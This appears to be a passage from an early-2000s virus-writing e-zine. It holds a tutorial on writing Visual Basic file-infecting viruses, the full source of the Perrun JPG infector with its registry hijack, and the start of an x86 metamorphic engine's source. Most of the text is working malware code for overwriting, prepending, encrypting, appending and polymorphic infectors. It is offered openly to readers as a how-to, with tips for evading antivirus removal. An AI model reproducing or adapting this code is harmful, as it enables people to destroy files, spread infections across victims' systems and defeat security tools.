the vb5 method, much shorter than the lennon method... if you wish to use the lennon method, then do so.. both have the same effects anyways.... ************************** f)the exact virus bytes ** ************************** you need the virus size to be able to carry on viral infection in visual basic... first put dummy size in the virus size constant.. then compile your source and use upx to compress the executable output... get the byte size of the compressed output and it will be the constant virus size that you'll put to your virus code... the smaller the virus, the better.... and that goes to a respected virus coder who likes his viruses small, Super... ****************************** g) the variables ************* ****************************** it is recommended to use option explicit and to define the variables that you'll use... your virus may not work properly if you don't define the variables that your virus will be using... i.e. Dim virusbytes as string Dim blah as long etc. some functions such as binary access read and binary access write require their variables to be explicitly defined... don't forget this... \\\\\\\\\\\\\\\\\\\\\ III - virology 101 \\\ \\\\\\\\\\\\\\\\\\\\\\\ so we're done on the preliminaries... we took up, *** getting started *** resolving virus path *** establishing the identity of the virus *** preventing reinfection and infecting all files per run or one file per run *** executing the hosts *** exact virus constant *** defining the variables and there's more... we're on the meat of the article so brace yourselves, get your popcorn and read.. ------------------- overwriting viruses ------------------- this is by far the easiest virus type to write.... an overwriting virus replaces its target files... it means that the target file will have the same filesize, same bytes as the virus... --------------- ----------------- ----------------- virus ------------> host ------------------> virus --------------- targets ----------------- host will become ----------------- ------------------------------ code III.a (overwrite) ------------------------------ 'targets exe files overwrite(virpath & eachhost) function overwrite(host as string) on error resume next dim virbyte as string dim sig as string dim virpath as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" filecopy virpath & app.exename & ".exe", host end function ------------------------------- assuming we have attached "signature" to the end of the original virus file with copy /b, then the reinfection of infected files shouldn't work.. :) ----------------------- overwriting viruses II ----------------------- if virus size is greater than the host, then the infected host will assume the size of the virus... if the host size is greater than the virus, then infected host will still hold the original host size.... ----------------- ---------------- ------------------- virus ---------------> host ------------> virus ----------------- targets ------------------- host ---------------- ------------------- ------------------------------ code III.c (overwrite II) ------------------------------ 'targets exe files overwriteII(virpath & eachhost) function overwriteII(host as string) on error resume next dim virbyte as string dim sig as string dim virpath as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte = Space(5632) <--- for example, virus length is 12345 Get #2, , virbyte Close #2 sig = "signature" 'insert signature to prevent reinfection Open host For Binary Access Write As #3 Put #3, , virbyte Put #3, , sig Close #3 end function ------------------------------- to check for the signature in this type of infection (since our signature file won't be contained at the end of the infected host file anymore), use the code below... ------------------------------------------------ Open virpath & host For Binary Access Read As #1 vsig = Space(5632 + 9) <----virus length + length of signature Get #1, , vsig 'neglect the other bits and bytes Close #1 marker = Right(vsig, 9) if marker = "signature" then 'search for more else 'infect ------------------------------------------------- there's no way we can reconstruct the original host infected by an overwriting virus... so vb boys and girls, overwriting viruses are dangerous coz they destroy.. --------------------------------------------------------- <<<<<<<<<<<<< prepending viruses >>>>>>>>>>>>>>>>> --------------------------------------------------------- a prepending virus copies itself to the beginning of the host file and move the bits and bytes of the host file and position it after the virus' bits and bytes.... two notable examples of this are the vb5 virus by murkry and lennon virus by the walrus... ------------------ ---------------------- ------------------ virus --------------> host --------------> virus ------------------ ---------------------- ------------------ host ------------------ ------------------------------ code III.c (prepend) ------------------------------ 'targets exe files prepend(virpath & eachhost) function prepend(host as string) on error resume next dim hostbyte as string dim virbyte as string dim sig as string dim virpath as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open host For Binary Access Read As #1 hostbyte = Space(LOF(1)) Get #1, , hostbyte Close #1 Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte = Space(5632) <-------- virus length ::: the virus constant from the compressed output, yo! Get #2, , virbyte Close #2 sig = "signature" Open host For Binary Access Write As #3 Put #3, , virbyte Put #3, , hostbyte Put #3, , sig Close #3 end function ------------------------------- regenerating the host from infected files should be easy... *** a prepending virus reconstructuring its host ###### if virus, prepended to a host, is executed, it reads the virus bytes and the hostbytes + signature, writes the hostbytes + signature to a file, executes the regenerated host file and deletes the regenerated file.... ------------------------------------- code III.c.i ------------------------------------- using vb5 method ------------------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF ... ... ' executed in infected host reghost(virpath & app.exename & ".exe") Function reghost(goat As String) On Error Resume Next Dim hostbyte2 As String Dim virbyte2 As String Dim virpath As String Dim dechost As String virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open goat For Binary Access Read As #1 virbyte2 = Space(5632) <------ virus length hostbyte2 = Space(LOF(1) - 5632) <-------- host length :) Get #1, , virbyte2 Get #1, , hostbyte2 Close #1 ' write the host bytes into a file open virpath & "host.exe" For Binary Access Write As #2 Put #2, , hostbyte2 Close #2 idProg = Shell(virpath & "host.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill virpath & "host.exe" End Function ------------------------------------------- --------------------------------- prepending viruses with a twist --------------------------------- the problem with prepending routine mentioned earlier is that avs can reconstruct the infected file... avs will just remove the virus from its position and relocate the host file to the position previously occupied by the virus... we want to give avs some headache, ayt? so we all agree... :) what do we want to do with the host file? "ENCRYPT IT, ALCO!".. i heard you, hehehehe.. so we'll encrypt the host file so "avs can do shit".. example of this is my virus VB.CHIMERA... ------------------ ---------------------- ------------------ virus --------------> host --------------> virus ------------------ ---------------------- ------------------ enchost ------------------ how do we do it? here's a code snippet that encrypts strings.. Function x(sText As String) On Error Resume Next Dim ekey As Long, i As Long Dim hash As String, crbyte As String ekey = 1234 <------- any number For i = 1 To Len(sText) hash = Asc(Mid(sText, i, 1)) crbyte = Chr(hash Xor (ekey Mod 255)) x = x & crbyte Next i End Function ------------------------------ code III.d (prepend with encryption) ------------------------------ 'targets exe files prepend(virpath & eachhost) function prepend(host as string) on error resume next dim hostbyte as string dim virbyte as string dim sig as string dim virpath as string dim enchost as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open host For Binary Access Read As #1 hostbyte = Space(LOF(1)) Get #1, , hostbyte Close #1 'encrypt host bytes enchost = x(hostbyte) Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte = Space(5632) <-------- virus length ::: this can be any number Get #2, , virbyte Close #2 sig = "signature" Open host For Binary Access Write As #3 Put #3, , virbyte Put #3, , enchost Put #3, , sig Close #3 end function ..... ..... ' function x encrypts strings Function x(sText As String) On Error Resume Next Dim ekey As Long, i As Long Dim hash As String, crbyte As String ekey = 1234 For i = 1 To Len(sText) hash = Asc(Mid(sText, i, 1)) crbyte = Chr(hash Xor (ekey Mod 255)) x = x & crbyte Next i End Function ------------------------------- so in an infected host file, the virus is in the beginning of the file and the host is encrypted in the end... to regenerate the host, we can't do reading the encrypted host, putting the bytes into a file and executing it.... the original host won't execute coz the output file is not a valid w32 applix.. it's still encrypted... so the solution to our problem is to decrypt it.... assuming the virus is in it's encrypted host and we want to regenerate the host.... just pass the encrypted hostbytes to the function x and it will decrypt the host on the fly... ------------------------------------- code III.d.i ------------------------------------- using vb5 method to reconstruct the host ------------------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF ... ... ' executed in infected host reghost(virpath & app.exename & ".exe") Function reghost(goat As String) On Error Resume Next Dim hostbyte2 As String Dim virbyte2 As String Dim virpath As String Dim dechost As String virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open goat For Binary Access Read As #1 virbyte2 = Space(5632) <------ virus length hostbyte2 = Space(LOF(1) - 5632) <-------- host length :) Get #1, , virbyte2 Get #1, , hostbyte2 Close #1 'decrypt encrypted host dechost = x(hostbyte2) open virpath & "host.exe" For Binary Access Write As #2 Put #2, , dechost Close #2 idProg = Shell(virpath & "host.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill virpath & "host.exe" End Function ..... ..... ' function x decrypts strings Function x(sText As String) On Error Resume Next Dim ekey As Long, i As Long Dim hash As String, crbyte As String ekey = 1234 For i = 1 To Len(sText) hash = Asc(Mid(sText, i, 1)) crbyte = Chr(hash Xor (ekey Mod 255)) x = x & crbyte Next i End Function ----------------------------------- again, avs will have a difficult time reconstructing the host file.... expect them to say, "you should delete infected files scanned as w32.blahblah virus..." nothing new... they always do that even if it's possible to reconstruct the host file.... avs are lazy.... \\\\\\\\\\\\\\\\\\\ IV - virology 102 \\ \\\\\\\\\\\\\\\\\\\\\ multicomponent vb virus in action!!! let's go, oi oi oi! reminder : to merge the components, use copy /b in ms-dos prompt.. if you ain't familiar with the command, type copy/? then press enter, :).. ----------------------- appending viruses ----------------------- i haven't seen an appending vb virus.... but i devised a way to make one.... from my previous article "Some New Ideas For Your Next VB Executable File Infector", ".... ====================================== appending vb viruses (sandwich method) ====================================== dim VIR as VB6 virus dim HOST as Host dim HD as VB6 component/pseudo-header illustration 2.a ================= ================== ====================== HD HD ================= ====================== VIR ------------------> HOST ------------------> HOST ================= ================== ====================== VIR ====================== illustration 2.b ================= ================== ====================== HD HD ================= ====================== HOST ------------------> HOST ------------------> HOST ================= ================== ====================== VIR VIR ================= ====================== ..." when an infected host is executed, the header is first called.... what does the header do? the header reads itself first then the virus code appended to the host, then writes the virusbytes and headerbytes into a file in this manner, ---------------- vir ---------------- hd ---------------- executes the vir/hd file thus continuing infection, reads the host bytes, writes the hostbytes in a file and executes the host... the intermediate virus file, ---------------- vir ---------------- hd ---------------- infects hosts in this manner.. it reads the vir bytes to a variable and the hd file in a variable, searches for a target file, reads the hostbytes into a variable, prepends the header file to the host then copies the hostbytes to the host and appends the virusbytes to the host.... here's a code snippet from my vb.sandwich virus ------------------------- code IV.a (vir component) ------------------------- .... .... Function virustime(hostpath As String) On Error Resume Next Dim ffile Dim hostcode As String Dim vir As String Dim vircode As String Dim header As String vir = App.Path If Right(vir, 1) <> "\" Then vir = vir & "\" Open hostpath For Binary Access Read As #1 hostcode = Space(LOF(1)) Get #1, , hostcode Close #1 ' the intermediate virus file = vir/hd Open vir & App.EXEName & ".exe" For Binary Access Read As #2 header = Space(LOF(2) - 5640) <------- header component (whole file minus virus bytes) vircode = Space(5640) <---- virus code Get #2, , vircode Get #2, , header Close #2 Open hostpath For Binary Access Write As #3 Put #3, , header Put #3, , hostcode Put #3, , vircode Close #3 End Function ------------------------ ---------------------------- code IV.b (header component) ---------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF .... .... Dim vdir As String Dim hdlen As String Dim hostlen As String Dim virlen As String Dim buffhdlen As String Dim buffhostlen As String Dim buffvirlen As String vdir = App.Path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" Open vdir & App.EXEName & ".exe" For Binary Access Read As #1 hdlen = (5632) hostlen = (LOF(1) - 11272) virlen = (5640) buffhdlen = Space(hdlen) buffhostlen = Space(hostlen) buffvirlen = Space(virlen) Get #1, , buffhdlen Get #1, , buffhostlen Get #1, , buffvirlen Close #1 'buff hostlen will contain the host bytes... .... .... Open vdir & "XxX.exe" For Binary Access Write As #3 Put #3, , buffhostlen Close #3 'borrowed from murkry's vb5 virus idProg = Shell(vdir & "XxX.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill vdir & "XxX.exe" --------------------------- so we have made an appending virus... i read symantec's desc of vb.sandwich and they said that the virus prepends and appends itself to hosts... we can make the header in win32asm thus optimizing the header and emulate a true appending virus... but i'm a visual basic purist so i decided to make the header in vb eventhough the header size is nearly equal to the virus size.... it's still an appending virus coz the header is non-viral.... the virus is appended to the host file... ------------------------- polymorphic viruses ------------------------- we can't make a true polymorphic virus in vb... but we can make an improvised poly virus in vb... this has been tested and proven to be possible via my vb viruses, vb.polly and vb.polly.b (encrypts hosts) from my previous article "Some New Ideas For Your Next VB Executable File Infector", ".... ======================================= polymorphic vb viruses (REALLY? YEAH!) ======================================= dim VIR as VB6 virus dim VIR1 as encrypted VB6 virus dim VIR2 as another encrypted form VB6 virus dim VIR(n) as another encrypted form VB6 virus dim HOST as Host dim ED as VB6 component/encryptor/decryptor illustration 3.a ... illustration 3.b ================= ================== ====================== ED ED ================= ====================== HOST ------------------> HOST ------------------> HOST ================= ================== ====================== VIR1 VIR2 ================= ====================== illustration 3.c ================= ================== ====================== ED ED ================= ====================== HOST ------------------> HOST ------------------> HOST ================= ================== ====================== VIR2 VIR(n) ================= ====================== ..." so let's make a pseudo code of this kinda virus ------------------------ pseudo-code I (encryptor/decryptor at the beginning) ------------------------ sub main() read ED and put in variable AX read HOST and put it in variable AY read VIR and put in in variable AZ read the key and put it in variable KEY decrypt AZ encrypted vir using KEY open virusfile for binary access write as #1 write decrypted VIR at the beginning write ED at the end close execute virusfile for infection delete virusfile write HOST in a new file execute HOST delete HOST end sub ------------------------- as you can see, this kinda virus produces an intermediate virus file, ---------------- vir ---------------- ed ---------------- and executes it to infect other files... ------------------------------ pseudo-code II (intermediate virus) ------------------------------ sub main() find new host read Decrypted VIR and put it in AX read ED and put it in AY read HOST and put it in AZ generate new KEY encrypt AX with new KEY.. open HOST for binary access write write AY (ED) in the beginning write AZ (HOST) in the middle write encrypted VIR write the new key at the end 'this will be used by our ed(encryptor/decryptor) to generate the variably encrypted virus.. close ------------------------------- if you'll imagine the infected files, the encrypted virus at the end possesses different forms in different files... thus polymorphism happened... if you're wondering how to insert the signature mark to prevent reinfection, i hope this illustration should help... intermediate virus produced by our poly vir infecting a host, ------------------------ virus reads virus code, ---------------------------- virus enc/dec with "alco" signature ------------------------ ------------> reads target host, reads enc/dec ----------> ---------------------------- enc/dec with attached with attached signature "alco" host "alco" at the end at the end, encrypts virus code with a new key ---------------------------- ------------------------ and writes the read components enc vir with new key to the host, the encrypted vir code and key ---------------------------- new key ---------------------------- ---------------------- preventing reinfection ---------------------- sub main() find host check for signature read the entire ed component+"alco" from the target host file if right(entire ed component + "alco", 4) <> "alco" then read virus code and put it in AX read ed and put it in AY read host and put it in AZ generate new key encrypt AX and with new key.. open host for binary access write write AY ed in the beginning write AZ host in the middle write encrypted virus code write the new key at the end 'this will be used by our ed(encryptor/decryptor) to generate the variably encrypted virus.. else search for more close ---------------------- you should attach the signature to the ed component using copy /b and treat the ed component length as ed component length plus the signature length... ---------------------- two-in-one viruses ---------------------- yes, we can put two virus codes that "cooperate" in one host.... again, from my previous article "Some New Ideas For Your Next VB Executable File Infector", "... ========================================= the two-in-one vb virus (alternating hit) ========================================= dim VIR as VB6 virus dim VIR1 as another VB6 virus dim HOST as Host illustration 4.a ================= ================== ====================== VIR VIR1 ================= ====================== ------------------> HOST ------------------> VIR1 HOST ================= ================== ====================== VIR ====================== illustration 4.b ================= ================== ====================== VIR1 VIR ================= ====================== ------------------> HOST ------------------> HOST HOST ================= ================== ====================== VIR VIR1 ================= ====================== ..." a notable example of this is my file infector vb.yin-yang.. |||||||||||||||||| pseudo code \\\\\\ \\\\\\\\\\\\\\\\\\\ VIR in the beginning sub main() read VIR bytes to A read Hostbytes to B read VIR1 bytes to C search for target if not infected then read target host bytes to D prepend C to host write D to host append A to host close host else search for more 'regenerate host copy B to a file execute file delete file end sub VIR1 in the beginning sub main() read VIR1 bytes to A read Hostbytes to B read VIR bytes to C search for target if not infected then read target host bytes to D prepend C to host write D to host append A to host close host else search for more 'regenerate host copy B to a file execute file delete file end sub ||||||||||||||||||||||||||| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ V - are you running out of ideas, alco? NOPE!\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ so that's all for now.. can't afford to make this article long coz i'm running out of patience, tea and cigarettes.. so expect a v1.1 of this article in the near future... i'm sure with the basic ideas, you can now code your first vb file infector... and with the basic ideas, you'll able to produces new, kewl ideas and implement it to your future file infector... help vb file infection grow by thinking of new things that we can implement on our future vb viruses...... bye for now, vb kids... \\\\\\\\\\\\\ alcopaul\\\\\\ \\\\\\\\\\\\\\\ july 19, 2002\\\ \\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ End of Text File\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

sources

Perrun Virus Source Code Alcopaul ----------------------------- Perrun Virus Source Code ----------------------------- i've written this when i was still a member of the rRlf ("hello rRlf guys!")... i decided to officially release the source in ebcvg #2... history -------- w32.hllp.jpginfector, as i named my lame proof-of-concept virus, was written on a fine afternoon of june 13, 2002 because i just wanted to make a working proof of my article "Infecting Picture Files : A Desperate Approach"... that lame article was written because of my reggae song "Your Kiss, Your Love and Some Pictures" dedicated to my girlfriend... so the root of all the Perrun phenomenon was not the eagerness to achieve fame... the root is LOVE... "Hi Janis!" :) after the finishing touches to the binary, i submitted it to av sites... trend, symantec, mcafee.. (can't clearly remember if i submitted it to avp, f-secure and sophos).... then i rested and ate my dinner.... i checked my mail again then i recieved the remails from symantec and mcafee... i cleaned those excess trashes but luckily i forgot to delete mcafee's ------------------------------------------------------------------------ From: "Vsample" <Vsample@avertlabs.com> To: "'alcopaul'" <alcopaul@digitelone.com> Subject: RE: Variant Found: 233006 - first virus attacking jpg files... Date: Thu, 13 Jun 2002 07:56:01 -0700 Thanks very much for the sample. We have named this to W32/Perrun We have added a description on our virus library. See link below. http://vil.nai.com/vil/content/v_99522.htm <http://vil.nai.com/vil/content/v_99522.htm> Again thanks very much and we value your contribution. Regards, Mohinder Gill Virus Research Analyst McAFEE AVERT (UK) A Division of NAI Labs When sending Virus Samples If you require further assistance with this virus or other virus detection and/or cleaning please send the proposed sample(s) zipped with the password "infected" (lower case) to one of the email addresses listed below. Please note: We sometimes receive a file that is analysed as cleaned, but actually find later that the file was infected when it left the sender, and was cleaned along the line by mail gateway scanners, hence the need for password-protected zip files. NOTE: We try our very best to process the incoming samples as soon as they arrive and hope to respond to customers on the same day. However our official response time for virus samples is 48 hours (excluding weekends). This time may be extended due to samples which require further analysis. All product-related questions and comments can be addressed through technical support and customer service, including: * Any Virus Removal issues * product installation and update questions * product usage questions * specific operating system/version questions For samples related issues please contact: UK: Vsample@nai.com USA: Virus_Research@nai.com Germany: Virus_Research_DE@nai.com France Virus_Research_FR@nai.com Rest of Europe Virus_Research_Europe@nai.com Please send samples to one of the above addresses only. For Technical Support issues please contact: UK- * +44 (0) 1296 318 733 * +44 (0) 1296 318 734 Email: TVD-Support-UK@nai.com <mailto:TVD-Support-UK@nai.com> Rest of Europe- tech-support-europe@nai.com * +31 (0) 20 586 6100 Useful WEB sites www.nai.com (Network Associates Inc. products) http://www.mcafeeb2b.com/asp_set/anti_virus/alerts/intro.asp (Stay ahead of New Viruses) http://www.mcafeeb2b.com/naicommon/download/dats/find.asp (Latest Dat files / SuperDats 4.1.60 engine) http://vil.nai.com/villib/alpha.asp (NAI Virus Library - Descriptions of viruses) -----Original Message----- From: alcopaul [mailto:alcopaul@digitelone.com] Sent: 13 June 2002 11:06 To: virus_research@nai.com Subject: Variant Found: 233006 - first virus attacking jpg files... << File: JPG_Virus_Final_Release.zip >> << File: MAVIS.txt >> hope to see a desc from your site.. it's a new way of infection.. :) ____________________________________________________________________ ** Get your free E-Mail account at WWW.DIGITELONE.COM ** ---------------------------------------------------------------------------- *** i just wanted mcafee to see a description of it from their site... nothing more, nothing less.. :P then two days after my submission of the virus to av sites, i checked out zdnet for some news.. then i found an article that refers to Perrun.. "what a heck! that's my virus!", i thought... i tried my luck to see some of my virus' articles in yahoo then i got a lot of hits... can't please everybody.. there exist many criticisms about this virus... i read a lot of them... hehehe.. but i don't care.. final thought : this is a lame virus that "shook" the news for one time... enjoy.. alcopaul indirect thanks to murkry.. i borrowed the spawned host execution routine from his vb virus... ========================= virus ========================= Attribute VB_Name = "Module1" Option Explicit Private Sub Main() On Error Resume Next Dim ffile Dim jpgvir As String Dim sfile As String Dim a As String Dim vc As String Dim spath As String Dim arr1 Dim host As Variant Dim lenhost As Long Dim mark As String Dim g As String 'probable host ffile = FreeFile 'resolve virus path jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" 'find picture files in directory of the virus sfile = Dir$(jpgvir & "*.jpg") While sfile <> "" a = a & spath & sfile & "/" sfile = Dir$ Wend 'store filenames in array arr1 = Split(a, "/") '1 by 1 query... and now introducing a new algorithm for 1 infection per run For Each host In arr1 'check for virus sig Open jpgvir & host For Binary Access Read As #ffile lenhost = (LOF(ffile)) vc = Space(lenhost) Get #ffile, , vc Close #ffile mark = Right(vc, 4) If mark <> "alco" Then 'not infected? 'infect! GoTo notinfected Else 'infected? 'search for moe! GoTo gggoop End If notinfected: '1 infection / run infest (jpgvir & host) Exit For gggoop: Next host g = Replace(jpgvir, "\", "\\") extractXTrktr (g & "extrk.exe") End Sub Function extractXTrktr(name As String) On Error Resume Next Dim a As String Dim jpgvir As String Dim vircode As String Dim extractrcode As String jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" Open jpgvir & App.EXEName & ".exe" For Binary Access Read As #1 vircode = Space(LOF(1) - 5636) extractrcode = Space(5636) Get #1, , vircode Get #1, , extractrcode Close #1 Open jpgvir & "extrk.exe" For Binary Access Write As #2 Put #2, , extractrcode Close #2 Open jpgvir & "reg.mp3" For Output As #3 Print #3, "REGEDIT4" Print #3, "" Print #3, "[HKEY_CLASSES_ROOT\jpegfile\shell\open\command]" Print #3, "@=""" & name & " %1""" Close #3 a = "regedit /s " & jpgvir & "reg.mp3" Shell a End Function Function infest(hostpath As String) On Error Resume Next Dim ffile Dim jpgcode As String Dim jpgvir As String Dim vircode As String ffile = FreeFile jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" Open hostpath For Binary Access Read As #ffile jpgcode = Space(LOF(ffile)) Get #ffile, , jpgcode Close #ffile Open jpgvir & App.EXEName & ".exe" For Binary Access Read As #1 vircode = Space(LOF(1)) Get #1, 1, vircode Close #1 Open hostpath For Binary Access Write As #ffile Put #ffile, , jpgcode Put #ffile, , vircode Close #ffile End Function 'proof.001, part of the first ever jpg virus by alcopaul 'w32.hllp.JPGInfector 'june 13, 2002 ======================= extractor ======================= Attribute VB_Name = "Module1" Option Explicit Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Sub Main() On Error Resume Next Dim HostLength As Long Dim HostCode As String Dim vircode As String Dim comm As String Dim ffile Dim lenhost As String Dim check As String Dim jpgvir As String Dim mark As String jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" ffile = FreeFile comm = Command Open comm For Binary Access Read As #ffile lenhost = (LOF(ffile)) check = Space(lenhost) Get #ffile, , check Close #ffile mark = Right(check, 4) If mark = "alco" Then Open comm For Binary Access Read As #ffile HostLength = (LOF(ffile) - 11780) HostCode = Space(HostLength) vircode = Space(11780) Get #ffile, , HostCode Get #ffile, , vircode Close #ffile Open jpgvir & "x.exe" For Binary Access Write As #ffile Put #ffile, , vircode Close #ffile DoEvents 'borrowed from murkry's vb5 virus idProg = Shell(jpgvir & "x.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill jpgvir & "x.exe" Else End If Shell "rundll32.exe C:\WINDOWS\SYSTEM\SHIMGVW.DLL,ImageView_Fullscreen " & comm End Sub 'proof.002 - part of the 1st jpg virus by alcopaul 'w32.hllp.JPGInfector 'june 13, 2002 =============== signature =============== alco -------------- Signature string that will be appended to the virus - alco

articles

Hackers’ Network Security Handbook assassin007 assassin007 wrote a 400 pages book called "Hackers’ Network Security Handbook". it used to be online at netsec.nnsol.com, but the page is down. there are no articles by him here, cause all are part of the book. i got the whole book as pdf, but i didn't want to violate his copyright, so i left the book (and parts of it) out of this zine. but when you're interested, drop me a mail, perhaps i'll hand out the pdf. philie

sources

BLM ~ BlueOwls Light Meta BlueOwl ; BLM ~ BlueOwls Light Meta ; ************************* ; ; Details ; ; Name: BLM (BlueOwls Light Meta) ; Date: 16 May 2005 ; Size: 412 bytes ; Morphing power: light ; Morphing type: non-expansion ; Compatibility: most common x86 and pentium specific (rdtsc/movzx/..) ; Platforms: all 32bit (and maybe 16bit) x86 instruction set OSes ; Used compiler: FASM 1.60 ; Bugs: hopefully none ; ; Morphing ; ; The following instructions can be morphed: ; ; 1. OP reg, reg -> changing the D bit (2) ; 2. OP (reg,) [(imm32+)reg] -> changing the unused SCALE bits (4) ; 3. OP (reg,) [(imm32+)reg+reg*1] -> swapping the regs (2) ; ; Any other instruction's size is calculated and skipped. ; ; Usage notes ; ; BLM can be usefull for any application which would like to do code ; morphing on its own, or other code. There are however, some things ; to keep note on: ; ; - Make sure you don't mix data with code, for example: ; > CALL _LABEL ; > DB "some string",0 ; > _LABEL: ; Would make the meta miscorrectly assume "some string",0 to be ; code. So make sure that in the codearea you specify is no data. ; - On input, esi is allowed to equal edi, but it is not recommended ; if it will cause the meta to morph itself on runtime. ; - This code does not need any data, and only needs to be able to ; execute. It is completely permutatable. ; ; Agreement ; ; This sourcecode is meant to be used in freeware and shareware ; programs, and therefor it is strictly prohibited to add any of this ; code in binary or source format in scan strings or other detection ; methods. If done, it will impact on the sellability of the product, ; and can result in high fees and/or trials before court. ; YOU HAVE BEEN WARNED use32 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ META SOURCE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; in: esi(ecx) = start of code to morph ; edi(ecx) = start of buffer to put morphed code in ; ecx = size of code to morph (and buffer) ; out: esi = esi + ecx ; edi = edi + ecx ; other registers are destroyed (except esp) BLM: cld lea ebx, [esi+ecx] ; ebx = ptr to end of code to morph nextcode: push ebx xor ecx, ecx push 4 pop ebx call .innext pop ebx rol edx, 7 ; simple RAND function neg dx cmp ebx, esi ja nextcode ret .next: movsb .innext: mov al, [esi] and al, 11100111b cmp al, 00100110b ; es/cs/ss/ds segment? jz .next ; check if more mov al, [esi] and al, 11111110b cmp al, 01100100b ; fs/gs segment? jz .next ; check if more cmp al, 11110010b ; repz/repnz? jz .next ; check if more cmp al, 01100110b ; WORD? jnz opcode mov bl, 2 ; set WORD size jmp .next ; ----------------------------------------------------------------------- opcode: mov al, [esi] cmp al, 0fh jnz branch_start movsb or al, [esi] ; ????1111 cmp al, 10001111b jz .6byte ; -> jxx label32 cmp al, 10111111b jz .3byte ; -> movzx/bt? jmp .done .6byte: movsb movsb movsb .3byte: movsb .done: movsb ret branch_start: shl al, 1 jc branch_1xxxxxxx branch_0xxxxxxx:shl al, 1 jc branch_01xxxxxx branch_00xxxxxx:shl al, 4 jnc op_rmrm_d op_eax: mov al, [esi] shr al, 1 jc .pr32 movsb movsb ret ; -> op al, imm8 .pr32: add ecx, ebx ; -> op eax, imm32 rep movsb movsb ret branch_01xxxxxx:cmp al, 11000000b jb .ncjump movsb ; -> jxx label8 .ncjump: cmp al, 068h jz do_5byte ; -> push imm32 cmp al, 06ah jnz .done ; -> popad/pushad/pop/push/dec/inc (reg) stosb ; -> push imm8 .done: movsb ret op_rmrm_d: mov al, [esi+1] ; -> 